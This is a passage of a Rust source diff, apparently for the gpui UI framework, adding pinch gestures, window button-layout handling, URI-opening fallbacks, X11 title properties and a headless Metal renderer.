+ /// This is faster than `paint_glyph` because it skips the per-glyph cache lookup.
+ /// Use `ShapedLine::compute_glyph_raster_data` to batch-compute raster bounds during prepaint.
+ pub fn paint_glyph_with_raster_bounds(
+ &mut self,
+ origin: Point<Pixels>,
+ _font_id: FontId,
+ _glyph_id: GlyphId,
+ _font_size: Pixels,
+ color: Hsla,
+ raster_bounds: Bounds<DevicePixels>,
+ params: &RenderGlyphParams,
+ ) -> Result<()> {
+ self.invalidator.debug_assert_paint();
+
+ let element_opacity = self.element_opacity();
+ let scale_factor = self.scale_factor();
+ let glyph_origin = origin.scale(scale_factor);
+
+ if !raster_bounds.is_zero() {
+ let tile = self
+ .sprite_atlas
+ .get_or_insert_with(¶ms.clone().into(), &mut || {
+ let (size, bytes) = self.text_system().rasterize_glyph(params)?;
+ Ok(Some((size, Cow::Owned(bytes))))
+ })?
+ .expect("Callback above only errors or returns Some");
+ let bounds = Bounds {
+ origin: glyph_origin.map(|px| px.floor()) + raster_bounds.origin.map(Into::into),
+ size: tile.bounds.size.map(Into::into),
+ };
+ let content_mask = self.content_mask().scale(scale_factor);
+ self.next_frame.scene.insert_primitive(MonochromeSprite {
+ order: 0,
+ pad: 0,
+ bounds,
+ content_mask,
+ color: color.opacity(element_opacity),
+ tile,
+ transformation: TransformationMatrix::unit(),
+ });
+ }
+ Ok(())
+ }
+
+ /// Paints an emoji glyph with pre-computed raster bounds.
+ ///
+ /// This is faster than `paint_emoji` because it skips the per-glyph cache lookup.
+ /// Use `ShapedLine::compute_glyph_raster_data` to batch-compute raster bounds during prepaint.
+ pub fn paint_emoji_with_raster_bounds(
+ &mut self,
+ origin: Point<Pixels>,
+ _font_id: FontId,
+ _glyph_id: GlyphId,
+ _font_size: Pixels,
+ raster_bounds: Bounds<DevicePixels>,
+ params: &RenderGlyphParams,
+ ) -> Result<()> {
+ self.invalidator.debug_assert_paint();
+
+ let scale_factor = self.scale_factor();
+ let glyph_origin = origin.scale(scale_factor);
+
+ if !raster_bounds.is_zero() {
+ let tile = self
+ .sprite_atlas
+ .get_or_insert_with(¶ms.clone().into(), &mut || {
+ let (size, bytes) = self.text_system().rasterize_glyph(params)?;
+ Ok(Some((size, Cow::Owned(bytes))))
+ })?
+ .expect("Callback above only errors or returns Some");
+
+ let bounds = Bounds {
+ origin: glyph_origin.map(|px| px.floor()) + raster_bounds.origin.map(Into::into),
+ size: tile.bounds.size.map(Into::into),
+ };
+ let content_mask = self.content_mask().scale(scale_factor);
+ let opacity = self.element_opacity();
+
+ self.next_frame.scene.insert_primitive(PolychromeSprite {
+ order: 0,
+ pad: 0,
+ grayscale: false,
+ bounds,
+ corner_radii: Default::default(),
+ content_mask,
+ tile,
+ opacity,
+ });
+ }
+ Ok(())
+ }
+
fn should_use_subpixel_rendering(&self, font_id: FontId, font_size: Pixels) -> bool {
if self.platform_window.background_appearance() != WindowBackgroundAppearance::Opaque {
return false;
@@ -3896,14 +4093,18 @@ impl Window {
/// Dispatch a mouse or keyboard event on the window.
#[profiling::function]
pub fn dispatch_event(&mut self, event: PlatformInput, cx: &mut App) -> DispatchEventResult {
- // Track whether this input was keyboard-based for focus-visible styling
+ // Track input modality for focus-visible styling and hover suppression.
+ // Hover is suppressed during keyboard modality so that keyboard navigation
+ // doesn't show hover highlights on the item under the mouse cursor.
+ let old_modality = self.last_input_modality;
self.last_input_modality = match &event {
- PlatformInput::KeyDown(_) | PlatformInput::ModifiersChanged(_) => {
- InputModality::Keyboard
- }
- PlatformInput::MouseDown(e) if e.is_focusing() => InputModality::Mouse,
+ PlatformInput::KeyDown(_) => InputModality::Keyboard,
+ PlatformInput::MouseMove(_) | PlatformInput::MouseDown(_) => InputModality::Mouse,
_ => self.last_input_modality,
};
+ if self.last_input_modality != old_modality {
+ self.refresh();
+ }
// Handlers may set this to false by calling `stop_propagation`.
cx.propagate_event = true;
@@ -3945,6 +4146,12 @@ impl Window {
self.modifiers = scroll_wheel.modifiers;
PlatformInput::ScrollWheel(scroll_wheel)
}
+ #[cfg(any(target_os = "linux", target_os = "macos"))]
+ PlatformInput::Pinch(pinch) => {
+ self.mouse_position = pinch.position;
+ self.modifiers = pinch.modifiers;
+ PlatformInput::Pinch(pinch)
+ }
// Translate dragging and dropping of external files from the operating system
// to internal drag and drop events.
PlatformInput::FileDrop(file_drop) => match file_drop {
@@ -4057,6 +4264,11 @@ impl Window {
self.refresh();
}
}
+
+ // Auto-release pointer capture on mouse up
+ if event.is::<MouseUpEvent>() && self.captured_hitbox.is_some() {
+ self.captured_hitbox = None;
+ }
}
fn dispatch_key_event(&mut self, event: &dyn Any, cx: &mut App) {
@@ -26,7 +26,8 @@ use gpui::{
Action, AnyWindowHandle, BackgroundExecutor, ClipboardItem, CursorStyle, DisplayId,
ForegroundExecutor, Keymap, Menu, MenuItem, OwnedMenu, PathPromptOptions, Platform,
PlatformDisplay, PlatformKeyboardLayout, PlatformKeyboardMapper, PlatformTextSystem,
- PlatformWindow, Result, RunnableVariant, Task, ThermalState, WindowAppearance, WindowParams,
+ PlatformWindow, Result, RunnableVariant, Task, ThermalState, WindowAppearance,
+ WindowButtonLayout, WindowParams,
};
#[cfg(any(feature = "wayland", feature = "x11"))]
use gpui::{Pixels, Point, px};
@@ -57,7 +58,7 @@ pub(crate) trait LinuxClient {
#[cfg(feature = "screen-capture")]
fn is_screen_capture_supported(&self) -> bool {
- false
+ true
}
#[cfg(feature = "screen-capture")]
@@ -114,6 +115,7 @@ pub(crate) struct LinuxCommon {
pub(crate) text_system: Arc<dyn PlatformTextSystem>,
pub(crate) appearance: WindowAppearance,
pub(crate) auto_hide_scrollbars: bool,
+ pub(crate) button_layout: WindowButtonLayout,
pub(crate) callbacks: PlatformHandlers,
pub(crate) signal: LoopSignal,
pub(crate) menus: Vec<OwnedMenu>,
@@ -140,6 +142,7 @@ impl LinuxCommon {
text_system,
appearance: WindowAppearance::Light,
auto_hide_scrollbars: false,
+ button_layout: WindowButtonLayout::linux_default(),
callbacks,
signal,
menus: Vec::new(),
@@ -601,6 +604,10 @@ impl<P: LinuxClient + 'static> Platform for LinuxPlatform<P> {
self.inner.with_common(|common| common.appearance)
}
+ fn button_layout(&self) -> Option<WindowButtonLayout> {
+ Some(self.inner.with_common(|common| common.button_layout))
+ }
+
fn register_url_scheme(&self, _: &str) -> Task<anyhow::Result<()>> {
Task::ready(Err(anyhow!("register_url_scheme unimplemented")))
}
@@ -633,28 +640,42 @@ pub(super) fn open_uri_internal(
if let Some(uri) = ashpd::Uri::parse(uri).log_err() {
executor
.spawn(async move {
- match ashpd::desktop::open_uri::OpenFileRequest::default()
- .activation_token(activation_token.clone().map(ashpd::ActivationToken::from))
- .send_uri(&uri)
- .await
- .and_then(|e| e.response())
- {
- Ok(()) => return,
- Err(e) => log::error!("Failed to open with dbus: {}", e),
- }
-
+ let mut xdg_open_failed = false;
for mut command in open::commands(uri.to_string()) {
if let Some(token) = activation_token.as_ref() {
command.env("XDG_ACTIVATION_TOKEN", token);
}
let program = format!("{:?}", command.get_program());
match smol::process::Command::from(command).spawn() {
- Ok(mut cmd) => {
- cmd.status().await.log_err();
- return;
+ Ok(mut cmd) => match cmd.status().await {
+ Ok(status) if status.success() => return,
+ Ok(status) => {
+ log::error!("Command {} exited with status: {}", program, status);
+ xdg_open_failed = true;
+ }
+ Err(e) => {
+ log::error!("Failed to get status from {}: {}", program, e);
+ xdg_open_failed = true;
+ }
+ },
+ Err(e) => {
+ log::error!("Failed to open with {}: {}", program, e);
+ xdg_open_failed = true;
}
+ }
+ }
+
+ if xdg_open_failed {
+ match ashpd::desktop::open_uri::OpenFileRequest::default()
+ .activation_token(activation_token.map(ashpd::ActivationToken::from))
+ .send_uri(&uri)
+ .await
+ .and_then(|e| e.response())
+ {
+ Ok(()) => {}
+ Err(ashpd::Error::Response(ashpd::desktop::ResponseError::Cancelled)) => {}
Err(e) => {
- log::error!("Failed to open with {}: {}", program, e)
+ log::error!("Failed to open with dbus: {}", e);
}
}
}
@@ -36,6 +36,9 @@ use wayland_client::{
wl_shm_pool, wl_surface,
},
};
+use wayland_protocols::wp::pointer_gestures::zv1::client::{
+ zwp_pointer_gesture_pinch_v1, zwp_pointer_gestures_v1,
+};
use wayland_protocols::wp::primary_selection::zv1::client::zwp_primary_selection_offer_v1::{
self, ZwpPrimarySelectionOfferV1,
};
@@ -92,8 +95,8 @@ use gpui::{
ForegroundExecutor, KeyDownEvent, KeyUpEvent, Keystroke, Modifiers, ModifiersChangedEvent,
MouseButton, MouseDownEvent, MouseExitEvent, MouseMoveEvent, MouseUpEvent, NavigationDirection,
Pixels, PlatformDisplay, PlatformInput, PlatformKeyboardLayout, PlatformWindow, Point,
- ScrollDelta, ScrollWheelEvent, SharedString, Size, TaskTiming, TouchPhase, WindowParams, point,
- profiler, px, size,
+ ScrollDelta, ScrollWheelEvent, SharedString, Size, TaskTiming, TouchPhase, WindowButtonLayout,
+ WindowParams, point, profiler, px, size,
};
use gpui_wgpu::{CompositorGpuHint, GpuContext};
use wayland_protocols::wp::linux_dmabuf::zv1::client::{
@@ -124,6 +127,7 @@ pub struct Globals {
pub layer_shell: Option<zwlr_layer_shell_v1::ZwlrLayerShellV1>,
pub blur_manager: Option<org_kde_kwin_blur_manager::OrgKdeKwinBlurManager>,
pub text_input_manager: Option<zwp_text_input_manager_v3::ZwpTextInputManagerV3>,
+ pub gesture_manager: Option<zwp_pointer_gestures_v1::ZwpPointerGesturesV1>,
pub dialog: Option<xdg_wm_dialog_v1::XdgWmDialogV1>,
pub executor: ForegroundExecutor,
}
@@ -164,6 +168,7 @@ impl Globals {
layer_shell: globals.bind(&qh, 1..=5, ()).ok(),
blur_manager: globals.bind(&qh, 1..=1, ()).ok(),
text_input_manager: globals.bind(&qh, 1..=1, ()).ok(),
+ gesture_manager: globals.bind(&qh, 1..=3, ()).ok(),
dialog: globals.bind(&qh, dialog_v..=dialog_v, ()).ok(),
executor,
qh,
@@ -208,6 +213,8 @@ pub(crate) struct WaylandClientState {
pub compositor_gpu: Option<CompositorGpuHint>,
wl_seat: wl_seat::WlSeat, // TODO: Multi seat support
wl_pointer: Option<wl_pointer::WlPointer>,
+ pinch_gesture: Option<zwp_pointer_gesture_pinch_v1::ZwpPointerGesturePinchV1>,
+ pinch_scale: f32,
wl_keyboard: Option<wl_keyboard::WlKeyboard>,
cursor_shape_device: Option<wp_cursor_shape_device_v1::WpCursorShapeDeviceV1>,
data_device: Option<wl_data_device::WlDataDevice>,
@@ -560,6 +567,19 @@ impl WaylandClient {
}
}
}
+ XDPEvent::ButtonLayout(layout_str) => {
+ if let Some(client) = client.0.upgrade() {
+ let layout = WindowButtonLayout::parse(&layout_str)
+ .log_err()
+ .unwrap_or_else(WindowButtonLayout::linux_default);
+ let mut client = client.borrow_mut();
+ client.common.button_layout = layout;
+
+ for window in client.windows.values_mut() {
+ window.set_button_layout();
+ }
+ }
+ }
XDPEvent::CursorTheme(theme) => {
if let Some(client) = client.0.upgrade() {
let mut client = client.borrow_mut();
@@ -584,6 +604,8 @@ impl WaylandClient {
wl_seat: seat,
wl_pointer: None,
wl_keyboard: None,
+ pinch_gesture: None,
+ pinch_scale: 1.0,
cursor_shape_device: None,
data_device,
primary_selection,
@@ -693,11 +715,6 @@ impl LinuxClient for WaylandClient {
None
}
- #[cfg(feature = "screen-capture")]
- fn is_screen_capture_supported(&self) -> bool {
- false
- }
-
#[cfg(feature = "screen-capture")]
fn screen_capture_sources(
&self,
@@ -1325,6 +1342,12 @@ impl Dispatch<wl_seat::WlSeat, ()> for WaylandClientStatePtr {
.as_ref()
.map(|cursor_shape_manager| cursor_shape_manager.get_pointer(&pointer, qh, ()));
+ state.pinch_gesture = state.globals.gesture_manager.as_ref().map(
+ |gesture_manager: &zwp_pointer_gestures_v1::ZwpPointerGesturesV1| {
+ gesture_manager.get_pinch_gesture(&pointer, qh, ())
+ },
+ );
+
if let Some(wl_pointer) = &state.wl_pointer {
wl_pointer.release();
}
@@ -1998,6 +2021,91 @@ impl Dispatch<wl_pointer::WlPointer, ()> for WaylandClientStatePtr {
}
}
+impl Dispatch<zwp_pointer_gestures_v1::ZwpPointerGesturesV1, ()> for WaylandClientStatePtr {
+ fn event(
+ _this: &mut Self,
+ _: &zwp_pointer_gestures_v1::ZwpPointerGesturesV1,
+ _: <zwp_pointer_gestures_v1::ZwpPointerGesturesV1 as Proxy>::Event,
+ _: &(),
+ _: &Connection,
+ _: &QueueHandle<Self>,
+ ) {
+ // The gesture manager doesn't generate events
+ }
+}
+
+impl Dispatch<zwp_pointer_gesture_pinch_v1::ZwpPointerGesturePinchV1, ()>
+ for WaylandClientStatePtr
+{
+ fn event(
+ this: &mut Self,
+ _: &zwp_pointer_gesture_pinch_v1::ZwpPointerGesturePinchV1,
+ event: <zwp_pointer_gesture_pinch_v1::ZwpPointerGesturePinchV1 as Proxy>::Event,
+ _: &(),
+ _: &Connection,
+ _: &QueueHandle<Self>,
+ ) {
+ use gpui::PinchEvent;
+
+ let client = this.get_client();
+ let mut state = client.borrow_mut();
+
+ let Some(window) = state.mouse_focused_window.clone() else {
+ return;
+ };
+
+ match event {
+ zwp_pointer_gesture_pinch_v1::Event::Begin {
+ serial: _,
+ time: _,
+ surface: _,
+ fingers: _,
+ } => {
+ state.pinch_scale = 1.0;
+ let input = PlatformInput::Pinch(PinchEvent {
+ position: state.mouse_location.unwrap_or(point(px(0.0), px(0.0))),
+ delta: 0.0,
+ modifiers: state.modifiers,
+ phase: TouchPhase::Started,
+ });
+ drop(state);
+ window.handle_input(input);
+ }
+ zwp_pointer_gesture_pinch_v1::Event::Update { time: _, scale, .. } => {
+ let new_absolute_scale = scale as f32;
+ let previous_scale = state.pinch_scale;
+ let zoom_delta = new_absolute_scale - previous_scale;
+ state.pinch_scale = new_absolute_scale;
+
+ let input = PlatformInput::Pinch(PinchEvent {
+ position: state.mouse_location.unwrap_or(point(px(0.0), px(0.0))),
+ delta: zoom_delta,
+ modifiers: state.modifiers,
+ phase: TouchPhase::Moved,
+ });
+ drop(state);
+ window.handle_input(input);
+ }
+ zwp_pointer_gesture_pinch_v1::Event::End {
+ serial: _,
+ time: _,
+ cancelled: _,
+ } => {
+ state.pinch_scale = 1.0;
+ let input = PlatformInput::Pinch(PinchEvent {
+ position: state.mouse_location.unwrap_or(point(px(0.0), px(0.0))),
+ delta: 0.0,
+ modifiers: state.modifiers,
+ phase: TouchPhase::Ended,
+ });
+ drop(state);
+ window.handle_input(input);
+ }
+ _ => {}
+ }
+ }
+}
+
impl Dispatch<wp_fractional_scale_v1::WpFractionalScaleV1, ObjectId> for WaylandClientStatePtr {
fn event(
this: &mut Self,
@@ -50,8 +50,10 @@ pub(crate) struct Callbacks {
should_close: Option<Box<dyn FnMut() -> bool>>,
close: Option<Box<dyn FnOnce()>>,
appearance_changed: Option<Box<dyn FnMut()>>,
+ button_layout_changed: Option<Box<dyn FnMut()>>,
}
+#[derive(Debug, Clone, Copy)]
struct RawWindow {
window: *mut c_void,
display: *mut c_void,
@@ -600,6 +602,7 @@ impl WaylandWindowStatePtr {
state.tiling = configure.tiling;
// Limit interactive resizes to once per vblank
if configure.resizing && state.resize_throttle {
+ state.surface_state.ack_configure(serial);
return;
} else if configure.resizing {
state.resize_throttle = true;
@@ -1036,6 +1039,14 @@ impl WaylandWindowStatePtr {
}
}
+ pub fn set_button_layout(&self) {
+ let callback = self.callbacks.borrow_mut().button_layout_changed.take();
+ if let Some(mut fun) = callback {
+ fun();
+ self.callbacks.borrow_mut().button_layout_changed = Some(fun);
+ }
+ }
+
pub fn primary_output_scale(&self) -> i32 {
self.state.borrow_mut().primary_output_scale()
}
@@ -1333,6 +1344,10 @@ impl PlatformWindow for WaylandWindow {
self.0.callbacks.borrow_mut().appearance_changed = Some(callback);
}
+ fn on_button_layout_changed(&self, callback: Box<dyn FnMut()>) {
+ self.0.callbacks.borrow_mut().button_layout_changed = Some(callback);
+ }
+
fn draw(&self, scene: &Scene) {
let mut state = self.borrow_mut();
@@ -1347,23 +1362,13 @@ impl PlatformWindow for WaylandWindow {
.display_ptr()
.cast::<std::ffi::c_void>(),
};
- let display_handle = rwh::HasDisplayHandle::display_handle(&raw_window)
- .unwrap()
- .as_raw();
- let window_handle = rwh::HasWindowHandle::window_handle(&raw_window)
- .unwrap()
- .as_raw();
-
- state
- .renderer
- .recover(display_handle, window_handle)
- .unwrap_or_else(|err| {
- panic!(
- "GPU device lost and recovery failed. \
+ state.renderer.recover(&raw_window).unwrap_or_else(|err| {
+ panic!(
+ "GPU device lost and recovery failed. \
This may happen after system suspend/resume. \
Please restart the application.\n\nError: {err}"
- )
- });
+ )
+ });
// The current scene references atlas textures that were cleared during recovery.
// Skip this frame and let the next frame rebuild the scene with fresh textures.
@@ -62,7 +62,7 @@ use gpui::{
AnyWindowHandle, Bounds, ClipboardItem, CursorStyle, DisplayId, FileDropEvent, Keystroke,
Modifiers, ModifiersChangedEvent, MouseButton, Pixels, PlatformDisplay, PlatformInput,
PlatformKeyboardLayout, PlatformWindow, Point, RequestFrameOptions, ScrollDelta, Size,
- TouchPhase, WindowParams, point, px,
+ TouchPhase, WindowButtonLayout, WindowParams, point, px,
};
use gpui_wgpu::{CompositorGpuHint, GpuContext};
@@ -472,6 +472,15 @@ impl X11Client {
window.window.set_appearance(appearance);
}
}
+ XDPEvent::ButtonLayout(layout_str) => {
+ let layout = WindowButtonLayout::parse(&layout_str)
+ .log_err()
+ .unwrap_or_else(WindowButtonLayout::linux_default);
+ client.with_common(|common| common.button_layout = layout);
+ for window in client.0.borrow_mut().windows.values_mut() {
+ window.window.set_button_layout();
+ }
+ }
XDPEvent::CursorTheme(_) | XDPEvent::CursorSize(_) => {
// noop, X11 manages this for us.
}
@@ -602,6 +611,9 @@ impl X11Client {
Ok(None) => {
break;
}
+ Err(err @ ConnectionError::IoError(..)) => {
+ return Err(EventHandlerError::from(err));
+ }
Err(err) => {
let err = handle_connection_error(err);
log::warn!("error while polling for X11 events: {err:?}");
@@ -225,6 +225,7 @@ fn find_visuals(xcb: &XCBConnection, screen_index: usize) -> VisualSet {
set
}
+#[derive(Debug, Clone, Copy)]
struct RawWindow {
connection: *mut c_void,
screen_id: usize,
@@ -249,6 +250,7 @@ pub struct Callbacks {
should_close: Option<Box<dyn FnMut() -> bool>>,
close: Option<Box<dyn FnOnce()>>,
appearance_changed: Option<Box<dyn FnMut()>>,
+ button_layout_changed: Option<Box<dyn FnMut()>>,
}
pub struct X11WindowState {
@@ -533,7 +535,7 @@ impl X11WindowState {
&& let Some(title) = titlebar.title
{
check_reply(
- || "X11 ChangeProperty8 on window title failed.",
+ || "X11 ChangeProperty8 on WM_NAME failed.",
xcb.change_property8(
xproto::PropMode::REPLACE,
x_window,
@@ -542,6 +544,16 @@ impl X11WindowState {
title.as_bytes(),
),
)?;
+ check_reply(
+ || "X11 ChangeProperty8 on _NET_WM_NAME failed.",
+ xcb.change_property8(
+ xproto::PropMode::REPLACE,
+ x_window,
+ atoms._NET_WM_NAME,
+ atoms.UTF8_STRING,
+ title.as_bytes(),
+ ),
+ )?;
}
if params.kind == WindowKind::PopUp {
@@ -1245,6 +1257,14 @@ impl X11WindowStatePtr {
self.callbacks.borrow_mut().appearance_changed = Some(fun);
}
}
+
+ pub fn set_button_layout(&self) {
+ let callback = self.callbacks.borrow_mut().button_layout_changed.take();
+ if let Some(mut fun) = callback {
+ fun();
+ self.callbacks.borrow_mut().button_layout_changed = Some(fun);
+ }
+ }
}
impl PlatformWindow for X11Window {
@@ -1591,6 +1611,10 @@ impl PlatformWindow for X11Window {
self.0.callbacks.borrow_mut().appearance_changed = Some(callback);
}
+ fn on_button_layout_changed(&self, callback: Box<dyn FnMut()>) {
+ self.0.callbacks.borrow_mut().button_layout_changed = Some(callback);
+ }
+
fn draw(&self, scene: &Scene) {
let mut inner = self.0.state.borrow_mut();
@@ -1603,23 +1627,13 @@ impl PlatformWindow for X11Window {
window_id: self.0.x_window,
visual_id: inner.visual_id,
};
- let display_handle = rwh::HasDisplayHandle::display_handle(&raw_window)
- .unwrap()
- .as_raw();
- let window_handle = rwh::HasWindowHandle::window_handle(&raw_window)
- .unwrap()
- .as_raw();
-
- inner
- .renderer
- .recover(display_handle, window_handle)
- .unwrap_or_else(|err| {
- panic!(
- "GPU device lost and recovery failed. \
+ inner.renderer.recover(&raw_window).unwrap_or_else(|err| {
+ panic!(
+ "GPU device lost and recovery failed. \
This may happen after system suspend/resume. \
Please restart the application.\n\nError: {err}"
- )
- });
+ )
+ });
// The current scene references atlas textures that were cleared during recovery.
// Skip this frame and let the next frame rebuild the scene with fresh textures.
@@ -15,6 +15,7 @@ pub enum Event {
CursorTheme(String),
#[cfg_attr(feature = "x11", allow(dead_code))]
CursorSize(u32),
+ ButtonLayout(String),
}
pub struct XDPEventSource {
@@ -51,6 +52,13 @@ impl XDPEventSource {
sender.send(Event::CursorSize(initial_size as u32))?;
}
+ if let Ok(initial_layout) = settings
+ .read::<String>("org.gnome.desktop.wm.preferences", "button-layout")
+ .await
+ {
+ sender.send(Event::ButtonLayout(initial_layout))?;
+ }
+
if let Ok(mut cursor_theme_changed) = settings
.receive_setting_changed_with_args(
"org.gnome.desktop.interface",
@@ -89,6 +97,25 @@ impl XDPEventSource {
.detach();
}
+ if let Ok(mut button_layout_changed) = settings
+ .receive_setting_changed_with_args(
+ "org.gnome.desktop.wm.preferences",
+ "button-layout",
+ )
+ .await
+ {
+ let sender = sender.clone();
+ background
+ .spawn(async move {
+ while let Some(layout) = button_layout_changed.next().await {
+ let layout = layout?;
+ sender.send(Event::ButtonLayout(layout))?;
+ }
+ anyhow::Ok(())
+ })
+ .detach();
+ }
+
let mut appearance_changed = settings.receive_color_scheme_changed().await?;
while let Some(scheme) = appearance_changed.next().await {
sender.send(Event::WindowAppearance(
@@ -1,8 +1,8 @@
use gpui::{
Capslock, KeyDownEvent, KeyUpEvent, Keystroke, Modifiers, ModifiersChangedEvent, MouseButton,
MouseDownEvent, MouseExitEvent, MouseMoveEvent, MousePressureEvent, MouseUpEvent,
- NavigationDirection, Pixels, PlatformInput, PressureStage, ScrollDelta, ScrollWheelEvent,
- TouchPhase, point, px,
+ NavigationDirection, PinchEvent, Pixels, PlatformInput, PressureStage, ScrollDelta,
+ ScrollWheelEvent, TouchPhase, point, px,
};
use crate::{
@@ -234,6 +234,27 @@ pub(crate) unsafe fn platform_input_from_native(
_ => None,
}
}
+ NSEventType::NSEventTypeMagnify => window_height.map(|window_height| {
+ let phase = match native_event.phase() {
+ NSEventPhase::NSEventPhaseMayBegin | NSEventPhase::NSEventPhaseBegan => {
+ TouchPhase::Started
+ }
+ NSEventPhase::NSEventPhaseEnded => TouchPhase::Ended,
+ _ => TouchPhase::Moved,
+ };
+
+ let magnification = native_event.magnification() as f32;
+
+ PlatformInput::Pinch(PinchEvent {
+ position: point(
+ px(native_event.locationInWindow().x as f32),
+ window_height - px(native_event.locationInWindow().y as f32),
+ ),
+ delta: magnification,
+ modifiers: read_modifiers(native_event),
+ phase,
+ })
+ }),
NSEventType::NSScrollWheel => window_height.map(|window_height| {
let phase = match native_event.phase() {
NSEventPhase::NSEventPhaseMayBegin | NSEventPhase::NSEventPhaseBegan => {
@@ -110,10 +110,12 @@ impl InstanceBufferPool {
pub(crate) struct MetalRenderer {
device: metal::Device,
- layer: metal::MetalLayer,
+ layer: Option<metal::MetalLayer>,
is_apple_gpu: bool,
is_unified_memory: bool,
presents_with_transaction: bool,
+ /// For headless rendering, tracks whether output should be opaque
+ opaque: bool,
command_queue: CommandQueue,
paths_rasterization_pipeline_state: metal::RenderPipelineState,
path_sprites_pipeline_state: metal::RenderPipelineState,
@@ -142,26 +144,9 @@ pub struct PathRasterizationVertex {
}
impl MetalRenderer {
+ /// Creates a new MetalRenderer with a CAMetalLayer for window-based rendering.
pub fn new(instance_buffer_pool: Arc<Mutex<InstanceBufferPool>>, transparent: bool) -> Self {
- // Prefer low‐power integrated GPUs on Intel Mac. On Apple
- // Silicon, there is only ever one GPU, so this is equivalent to
- // `metal::Device::system_default()`.
- let device = if let Some(d) = metal::Device::all()
- .into_iter()
- .min_by_key(|d| (d.is_removable(), !d.is_low_power()))
- {
- d
- } else {
- // For some reason `all()` can return an empty list, see https://github.com/zed-industries/zed/issues/37689
- // In that case, we fall back to the system default device.
- log::error!(
- "Unable to enumerate Metal devices; attempting to use system default device"
- );
- metal::Device::system_default().unwrap_or_else(|| {
- log::error!("unable to access a compatible graphics device");
- std::process::exit(1);
- })
- };
+ let device = Self::create_device();
let layer = metal::MetalLayer::new();
layer.set_device(&device);
@@ -182,6 +167,48 @@ impl MetalRenderer {
| AutoresizingMask::HEIGHT_SIZABLE
];
}
+
+ Self::new_internal(device, Some(layer), !transparent, instance_buffer_pool)
+ }
+
+ /// Creates a new headless MetalRenderer for offscreen rendering without a window.
+ ///
+ /// This renderer can render scenes to images without requiring a CAMetalLayer,
+ /// window, or AppKit. Use `render_scene_to_image()` to render scenes.
+ #[cfg(any(test, feature = "test-support"))]
+ pub fn new_headless(instance_buffer_pool: Arc<Mutex<InstanceBufferPool>>) -> Self {
+ let device = Self::create_device();
+ Self::new_internal(device, None, true, instance_buffer_pool)
+ }
+
+ fn create_device() -> metal::Device {
+ // Prefer low‐power integrated GPUs on Intel Mac. On Apple
+ // Silicon, there is only ever one GPU, so this is equivalent to
+ // `metal::Device::system_default()`.
+ if let Some(d) = metal::Device::all()
+ .into_iter()
+ .min_by_key(|d| (d.is_removable(), !d.is_low_power()))
+ {
+ d
+ } else {
+ // For some reason `all()` can return an empty list, see https://github.com/zed-industries/zed/issues/37689
+ // In that case, we fall back to the system default device.
+ log::error!(
+ "Unable to enumerate Metal devices; attempting to use system default device"
+ );
+ metal::Device::system_default().unwrap_or_else(|| {
+ log::error!("unable to access a compatible graphics device");
+ std::process::exit(1);
+ })
+ }
+ }
+
+ fn new_internal(
+ device: metal::Device,
+ layer: Option<metal::MetalLayer>,
+ opaque: bool,
+ instance_buffer_pool: Arc<Mutex<InstanceBufferPool>>,
+ ) -> Self {
#[cfg(feature = "runtime_shaders")]
let library = device
.new_library_with_source(&SHADERS_SOURCE_FILE, &metal::CompileOptions::new())
@@ -303,6 +330,7 @@ impl MetalRenderer {
presents_with_transaction: false,
is_apple_gpu,
is_unified_memory,
+ opaque,
command_queue,
paths_rasterization_pipeline_state,
path_sprites_pipeline_state,
@@ -322,12 +350,15 @@ impl MetalRenderer {
}
}
- pub fn layer(&self) -> &metal::MetalLayerRef {
- &self.layer
+ pub fn layer(&self) -> Option<&metal::MetalLayerRef> {
+ self.layer.as_ref().map(|l| l.as_ref())
}
pub fn layer_ptr(&self) -> *mut CAMetalLayer {
- self.layer.as_ptr()
+ self.layer
+ .as_ref()
+ .map(|l| l.as_ptr())
+ .unwrap_or(ptr::null_mut())
}
pub fn sprite_atlas(&self) -> &Arc<MetalAtlas> {
@@ -336,26 +367,25 @@ impl MetalRenderer {
pub fn set_presents_with_transaction(&mut self, presents_with_transaction: bool) {
self.presents_with_transaction = presents_with_transaction;
- self.layer
- .set_presents_with_transaction(presents_with_transaction);
+ if let Some(layer) = &self.layer {
+ layer.set_presents_with_transaction(presents_with_transaction);
+ }
}
pub fn update_drawable_size(&mut self, size: Size<DevicePixels>) {
- let size = NSSize {
- width: size.width.0 as f64,
- height: size.height.0 as f64,
- };
- unsafe {
- let _: () = msg_send![
- self.layer(),
- setDrawableSize: size
- ];
+ if let Some(layer) = &self.layer {
+ let ns_size = NSSize {
+ width: size.width.0 as f64,
+ height: size.height.0 as f64,
+ };
+ unsafe {
+ let _: () = msg_send![
+ layer.as_ref(),
+ setDrawableSize: ns_size
+ ];
+ }
}
- let device_pixels_size = Size {
- width: DevicePixels(size.width as i32),
- height: DevicePixels(size.height as i32),
- };
- self.update_path_intermediate_textures(device_pixels_size);
+ self.update_path_intermediate_textures(size);
}
fn update_path_intermediate_textures(&mut self, size: Size<DevicePixels>) {
@@ -396,8 +426,11 @@ impl MetalRenderer {
}
}
- pub fn update_transparency(&self, transparent: bool) {
- self.layer.set_opaque(!transparent);
+ pub fn update_transparency(&mut self, transparent: bool) {
+ self.opaque = !transparent;
+ if let Some(layer) = &self.layer {
+ layer.set_opaque(!transparent);
+ }
}
pub fn destroy(&self) {
@@ -405,7 +438,15 @@ impl MetalRenderer {
}
pub fn draw(&mut self, scene: &Scene) {
- let layer = self.layer.clone();
+ let layer = match &self.layer {
+ Some(l) => l.clone(),
+ None => {
+ log::error!(
+ "draw() called on headless renderer - use render_scene_to_image() instead"
+ );
+ return;
+ }
+ };
let viewport_size = layer.drawable_size();
let viewport_size: Size<DevicePixels> = size(
(viewport_size.width.ceil() as i32).into(),
@@ -476,9 +517,15 @@ impl MetalRenderer {
/// Renders the scene to a texture and returns the pixel data as an RGBA image.
/// This does not present the frame to screen - useful for visual testing
/// where we want to capture what would be rendered without displaying it.
+ ///
+ /// Note: This requires a layer-backed renderer. For headless rendering,
+ /// use `render_scene_to_image()` instead.
#[cfg(any(test, feature = "test-support"))]
pub fn render_to_image(&mut self, scene: &Scene) -> Result<RgbaImage> {
- let layer = self.layer.clone();
+ let layer = self
+ .layer
+ .clone()
+ .ok_or_else(|| anyhow::anyhow!("render_to_image requires a layer-backed renderer"))?;
let viewport_size = layer.drawable_size();
let viewport_size: Size<DevicePixels> = size(
(viewport_size.width.ceil() as i32).into(),
@@ -567,21 +614,146 @@ impl MetalRenderer {
}
}
+ /// Renders a scene to an image without requiring a window or CAMetalLayer.
+ ///
+ /// This is the primary method for headless rendering. It creates an offscreen
+ /// texture, renders the scene to it, and returns the pixel data as an RGBA image.
+ #[cfg(any(test, feature = "test-support"))]
